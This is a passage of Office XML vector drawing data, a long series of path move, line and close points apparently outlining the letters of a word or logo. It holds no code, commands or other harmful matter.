                  <a:lnTo>
                    <a:pt x="117735" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123038" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127874" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136612" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141265" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112817" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107310" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99832" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97800" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97475" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147483" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147483" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147201" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147118" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97414" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97723" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97739" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99243" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104593" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108143" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143040" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142768" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139111" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134406" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128669" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122292" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123253" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114097" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="146203" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="143785" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141265" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137851" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129195" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124725" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146203" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="143040" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116881" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120214" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124501" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125558" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125639" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125761" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147118" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146958" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145571" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145497" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145385" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143040" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="170486" y="100136"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="167803" y="100136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167803" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168322" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171177" y="117997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175139" y="118688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184324" y="119826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188997" y="120111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199543" y="120111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204786" y="119562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214052" y="117327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217994" y="115518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221286" y="112999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224558" y="110540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227098" y="107126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228265" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187514" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184570" y="103956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184348" y="103956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176399" y="102148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173148" y="101193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170486" y="100136"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="86603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="209744" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="90586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209481" y="92841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194565" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228265" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230735" y="98389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231570" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="86603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="195053" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187290" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183308" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160529" y="53014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160529" y="58622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160943" y="65673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161013" y="66868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180808" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194260" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197816" y="92841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204217" y="90322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207123" y="88635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209596" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192777" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189140" y="75427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184263" y="70245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183044" y="65673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183106" y="53014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184466" y="48605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190181" y="42062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191487" y="41533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194504" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209622" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207164" y="27777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204420" y="26578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198406" y="24830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195053" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="40375"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="201697" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203323" y="40517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206960" y="41127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208484" y="41533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="42062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="72948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208017" y="74086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206087" y="75000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201901" y="76382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199747" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="40375"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="210415" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209622" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="276801" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="254896" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254896" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276801" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276801" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="277410" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="254286" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254286" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277410" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277410" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="321830" y="41086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="299925" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299925" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301998" y="87172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310288" y="94060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316608" y="95767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328922" y="95767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332133" y="95605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337395" y="94914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339875" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="93837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329369" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327296" y="80548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="78902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323436" y="77764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322867" y="76341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322257" y="74919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321932" y="73334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="41086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="342232" y="78902"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="340403" y="78902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339692" y="79308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338411" y="79755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334734" y="80731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333250" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="78902"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="342232" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="290944" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290944" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="321830" y="6807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="299925" y="6807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299925" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="6807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="424102" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="400672" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400672" y="61792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423423" y="94088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440845" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450164" y="95759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477150" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434932" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430833" y="77601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429798" y="76529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425402" y="71404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424169" y="66974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424102" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="481079" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="457650" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457650" y="66974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456395" y="71404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456309" y="71708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450924" y="77601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446677" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477150" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478523" y="76529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480433" y="69645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481074" y="61792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481079" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="502131" y="72887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="500140" y="72887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500140" y="90850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503127" y="92232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507089" y="93491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516965" y="95747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522472" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528547" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562879" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525682" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522614" y="81421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503228" y="73659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502131" y="72887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="540313" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="535212" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525683" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527008" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520775" y="26034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514822" y="28082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509751" y="30926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503553" y="35275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500444" y="40721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500494" y="52526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529035" y="69595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531229" y="69981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532855" y="70347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536249" y="71038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538545" y="71749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540983" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541593" y="74492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541593" y="77967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540556" y="79369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536431" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533241" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562879" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563811" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563925" y="68010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562543" y="64007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536736" y="51693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534338" y="51246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528080" y="49946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525499" y="49113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523325" y="47406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522776" y="46166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522776" y="42773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523975" y="41391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528791" y="39461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531758" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="29260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558194" y="28082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554537" y="26984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545189" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540313" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="560816" y="38973"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="539520" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543726" y="39664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552017" y="42468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555715" y="44277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558946" y="46491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="46491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="38973"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="614359" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="578217" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575629" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576311" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600103" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600314" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608338" y="95679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617997" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623300" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628116" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636874" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641527" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613079" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607572" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600074" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598042" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597717" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647725" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647725" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647445" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647362" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597656" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597965" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597981" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599505" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602208" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604854" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608385" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643290" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643019" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639353" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634648" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628914" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622541" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623501" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614359" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="646445" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="644027" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641527" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638093" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629437" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624966" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="643290" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="617123" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620455" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622609" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624743" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625800" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625881" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626003" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647362" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647203" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645819" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645746" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645635" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643290" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="687532" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="665627" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665627" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="48808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690275" y="47833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692856" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697611" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="715025" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
